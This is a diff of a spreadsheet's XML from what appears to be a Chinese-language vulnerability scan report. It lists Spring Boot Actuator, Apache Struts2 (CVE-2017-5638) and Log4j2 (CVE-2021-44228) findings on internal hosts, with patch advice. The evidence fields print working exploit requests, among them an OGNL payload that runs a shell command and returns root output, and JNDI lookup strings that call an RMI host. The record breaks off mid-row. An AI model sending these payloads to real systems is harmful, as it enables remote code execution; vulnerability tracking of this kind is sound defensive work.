-        </is>
-      </c>
-      <c r="Z17" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="18">
-      <c r="A18" t="inlineStr">
-        <is>
-          <t>Spring Boot Actuator未授权访问漏洞</t>
-        </is>
-      </c>
-      <c r="B18" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C18" t="inlineStr">
-        <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D18" t="inlineStr">
-        <is>
-          <t>Unauthorized Access</t>
-        </is>
-      </c>
-      <c r="E18" t="inlineStr">
-        <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁下载链接：https://github.com/spring-cloud/spring-cloud-function/tree/0e89ee27b2e76138c16bcba6f4bca906c4f3744f</t>
-        </is>
-      </c>
-      <c r="F18" t="inlineStr">
-        <is>
-          <t>Spring存在未授权访问漏洞，攻击者可以通过默认端口无需密码对数据库任意操作(增删改高危动作)，而且可以远程访问数据库。</t>
-        </is>
-      </c>
-      <c r="G18" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure、Active Vuln</t>
-        </is>
-      </c>
-      <c r="H18" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I18" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J18" t="inlineStr"/>
-      <c r="K18" t="inlineStr">
-        <is>
-          <t>2026-06-08 16:38</t>
-        </is>
-      </c>
-      <c r="L18" t="inlineStr">
-        <is>
-          <t>2026-06-08 16:38</t>
-        </is>
-      </c>
-      <c r="M18" t="inlineStr">
-        <is>
-          <t>192.168.100.200</t>
-        </is>
-      </c>
-      <c r="N18" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O18" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P18" t="inlineStr"/>
-      <c r="Q18" t="inlineStr"/>
-      <c r="R18" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S18" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T18" t="inlineStr"/>
-      <c r="U18" t="inlineStr">
-        <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="V18" t="inlineStr">
-        <is>
-          <t>10.8.0.23:6035/actuator/info</t>
-        </is>
-      </c>
-      <c r="W18" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X18" t="inlineStr">
-        <is>
-          <t xml:space="preserve">页面url: 10.8.0.23:6035/actuator/info
-请求体: GET /actuator/info HTTP/1.1
-accept-encoding: gzip
-user-agent: ReactorNetty/0.9.10.RELEASE
-host: 10.8.0.23:6035
-Accept: application/vnd.spring-boot.actuator.v2+json, application/vnd.spring-boot.actuator.v1+json, application/json
-响应体: HTTP/1.1 200
-X-Content-Type-Options: nosniff
-X-XSS-Protection: 1; mode=block
-Cache-Control: no-cache, no-store, max-age=0, must-revalidate
-Pragma: no-cache
-Expires: 0
-Content-Type: application/vnd.spring-boot.actuator.v2+json
-Transfer-Encoding: chunked
-Date: Thu, 30 Nov 2023 07:31:42 GMT
-{}
-</t>
-        </is>
-      </c>
       <c r="Y18" t="inlineStr">
         <is>
           <t>待处置</t>

--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -423,7 +423,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:Y1"/>
+  <dimension ref="A1:Y45"/>
   <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <sheetData>
     <row r="1">
@@ -550,6 +550,6139 @@
       <c r="Y1" s="1" t="inlineStr">
         <is>
           <t>数据来源</t>
+        </is>
+      </c>
+    </row>
+    <row r="2">
+      <c r="A2" t="inlineStr">
+        <is>
+          <t>Apache Struts2 代码执行漏洞(CVE-2017-5638)</t>
+        </is>
+      </c>
+      <c r="B2" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C2" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D2" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
+      <c r="E2" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://cwiki.apache.org/confluence/display/WW/S2-045</t>
+        </is>
+      </c>
+      <c r="F2" t="inlineStr">
+        <is>
+          <t>Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞，该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有＃cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。</t>
+        </is>
+      </c>
+      <c r="G2" t="inlineStr">
+        <is>
+          <t>APT利用、有攻击代码披露、活跃漏洞、勒索利用、病毒利用、高可利用</t>
+        </is>
+      </c>
+      <c r="H2" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I2" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J2" t="inlineStr">
+        <is>
+          <t>CVE-2017-5638</t>
+        </is>
+      </c>
+      <c r="K2" t="inlineStr">
+        <is>
+          <t>2026-07-13 17:02</t>
+        </is>
+      </c>
+      <c r="L2" t="inlineStr">
+        <is>
+          <t>2026-07-13 17:02</t>
+        </is>
+      </c>
+      <c r="M2" t="inlineStr">
+        <is>
+          <t>192.168.106.130</t>
+        </is>
+      </c>
+      <c r="N2" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O2" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P2" t="inlineStr"/>
+      <c r="Q2" t="inlineStr"/>
+      <c r="R2" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S2" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T2" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="U2" t="inlineStr">
+        <is>
+          <t>10.100.12.1:8015/doUpload.action</t>
+        </is>
+      </c>
+      <c r="V2" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W2" t="inlineStr">
+        <is>
+          <t>页面url: 10.100.12.1:8015/doUpload.action
+请求体: POST /doUpload.action HTTP/1.1
+User-Agent: python-requests/2.18.4
+Connection: keep-alive
+Accept-Encoding: deflate
+Accept: */*
+Content-Type: multipart/form-data; boundary=---------------------------WEBKIT198919991920098822555
+Content-Length: 763
+Host: 10.100.12.1:8015
+-----------------------------WEBKIT198919991920098822555
+Content-Disposition: form-data; name="foo"; filename="{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b"
+Content-Type: text/plain
+zzzzz
+-----------------------------WEBKIT198919991920098822555--
+响应体: 
+HTTP/1.1 200
+Transfer-Encoding: chunked
+Date: Tue, 30 Apr 2019 05:07:52 GMT
+uid=0(root) gid=0(root) groups=0(root)</t>
+        </is>
+      </c>
+      <c r="X2" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y2" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="3">
+      <c r="A3" t="inlineStr">
+        <is>
+          <t>Apache Struts2 代码执行漏洞(CVE-2017-5638)</t>
+        </is>
+      </c>
+      <c r="B3" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C3" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D3" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
+      <c r="E3" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://cwiki.apache.org/confluence/display/WW/S2-045</t>
+        </is>
+      </c>
+      <c r="F3" t="inlineStr">
+        <is>
+          <t>Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞，该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有＃cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。</t>
+        </is>
+      </c>
+      <c r="G3" t="inlineStr">
+        <is>
+          <t>APT利用、有攻击代码披露、活跃漏洞、勒索利用、病毒利用、高可利用</t>
+        </is>
+      </c>
+      <c r="H3" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I3" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J3" t="inlineStr">
+        <is>
+          <t>CVE-2017-5638</t>
+        </is>
+      </c>
+      <c r="K3" t="inlineStr">
+        <is>
+          <t>2026-07-13 16:57</t>
+        </is>
+      </c>
+      <c r="L3" t="inlineStr">
+        <is>
+          <t>2026-07-13 16:57</t>
+        </is>
+      </c>
+      <c r="M3" t="inlineStr">
+        <is>
+          <t>192.168.35.73</t>
+        </is>
+      </c>
+      <c r="N3" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O3" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P3" t="inlineStr"/>
+      <c r="Q3" t="inlineStr"/>
+      <c r="R3" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S3" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T3" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="U3" t="inlineStr">
+        <is>
+          <t>192.168.35.73:80/doUpload.action</t>
+        </is>
+      </c>
+      <c r="V3" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W3" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.35.73:80/doUpload.action
+请求体: POST /doUpload.action HTTP/1.1
+User-Agent: python-requests/2.18.4
+Connection: keep-alive
+Accept-Encoding: deflate
+Accept: */*
+Content-Type: multipart/form-data; boundary=---------------------------WEBKIT198919991920098822555
+Content-Length: 763
+Host: 10.100.12.1:8015
+-----------------------------WEBKIT198919991920098822555
+Content-Disposition: form-data; name="foo"; filename="{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b"
+Content-Type: text/plain
+zzzzz
+-----------------------------WEBKIT198919991920098822555--
+响应体: 
+HTTP/1.1 200
+Transfer-Encoding: chunked
+Date: Tue, 30 Apr 2019 05:07:52 GMT
+uid=0(root) gid=0(root) groups=0(root)</t>
+        </is>
+      </c>
+      <c r="X3" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y3" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="4">
+      <c r="A4" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B4" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C4" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D4" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E4" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F4" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G4" t="inlineStr">
+        <is>
+          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H4" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I4" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J4" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K4" t="inlineStr">
+        <is>
+          <t>2026-07-13 15:07</t>
+        </is>
+      </c>
+      <c r="L4" t="inlineStr">
+        <is>
+          <t>2026-07-13 15:07</t>
+        </is>
+      </c>
+      <c r="M4" t="inlineStr">
+        <is>
+          <t>192.168.50.143</t>
+        </is>
+      </c>
+      <c r="N4" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O4" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P4" t="inlineStr"/>
+      <c r="Q4" t="inlineStr"/>
+      <c r="R4" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S4" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T4" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U4" t="inlineStr">
+        <is>
+          <t>192.168.50.143/</t>
+        </is>
+      </c>
+      <c r="V4" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W4" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.50.143/
+请求体: POST / HTTP/1.1
+Host: 192.168.50.98
+User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept: */*
+Connection: keep-alive
+Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Type: application/x-www-form-urlencoded
+Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Length: 45
+${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+响应体: HTTP/1.1 400 Bad Request
+Content-Type: text/html; charset=us-ascii
+Server: Microsoft-HTTPAPI/2.0
+Date: Fri, 09 Sep 2022 01:54:21 GMT
+Connection: close
+Content-Length: 311
+&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
+&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
+&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
+&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
+&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
+&lt;/BODY&gt;&lt;/HTML&gt;</t>
+        </is>
+      </c>
+      <c r="X4" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y4" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="5">
+      <c r="A5" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B5" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C5" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D5" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E5" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F5" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G5" t="inlineStr">
+        <is>
+          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H5" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I5" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J5" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K5" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:36</t>
+        </is>
+      </c>
+      <c r="L5" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:36</t>
+        </is>
+      </c>
+      <c r="M5" t="inlineStr">
+        <is>
+          <t>192.168.50.76</t>
+        </is>
+      </c>
+      <c r="N5" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O5" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P5" t="inlineStr"/>
+      <c r="Q5" t="inlineStr"/>
+      <c r="R5" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S5" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T5" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U5" t="inlineStr">
+        <is>
+          <t>192.168.50.76/</t>
+        </is>
+      </c>
+      <c r="V5" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W5" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.50.76/
+请求体: POST / HTTP/1.1
+Host: 192.168.50.98
+User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept: */*
+Connection: keep-alive
+Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Type: application/x-www-form-urlencoded
+Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Length: 45
+${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+响应体: HTTP/1.1 400 Bad Request
+Content-Type: text/html; charset=us-ascii
+Server: Microsoft-HTTPAPI/2.0
+Date: Fri, 09 Sep 2022 01:54:21 GMT
+Connection: close
+Content-Length: 311
+&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
+&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
+&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
+&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
+&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
+&lt;/BODY&gt;&lt;/HTML&gt;</t>
+        </is>
+      </c>
+      <c r="X5" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y5" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="6">
+      <c r="A6" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B6" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C6" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D6" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E6" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F6" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G6" t="inlineStr">
+        <is>
+          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H6" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I6" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J6" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K6" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:33</t>
+        </is>
+      </c>
+      <c r="L6" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:33</t>
+        </is>
+      </c>
+      <c r="M6" t="inlineStr">
+        <is>
+          <t>10.223.2.62</t>
+        </is>
+      </c>
+      <c r="N6" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O6" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P6" t="inlineStr"/>
+      <c r="Q6" t="inlineStr">
+        <is>
+          <t>b</t>
+        </is>
+      </c>
+      <c r="R6" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S6" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T6" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U6" t="inlineStr">
+        <is>
+          <t>10.223.2.62/</t>
+        </is>
+      </c>
+      <c r="V6" t="inlineStr">
+        <is>
+          <t>未暴露</t>
+        </is>
+      </c>
+      <c r="W6" t="inlineStr">
+        <is>
+          <t>页面url: 10.223.2.62/
+请求体: POST / HTTP/1.1
+Host: 192.168.50.98
+User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept: */*
+Connection: keep-alive
+Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Type: application/x-www-form-urlencoded
+Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Length: 45
+${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+响应体: HTTP/1.1 400 Bad Request
+Content-Type: text/html; charset=us-ascii
+Server: Microsoft-HTTPAPI/2.0
+Date: Fri, 09 Sep 2022 01:54:21 GMT
+Connection: close
+Content-Length: 311
+&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
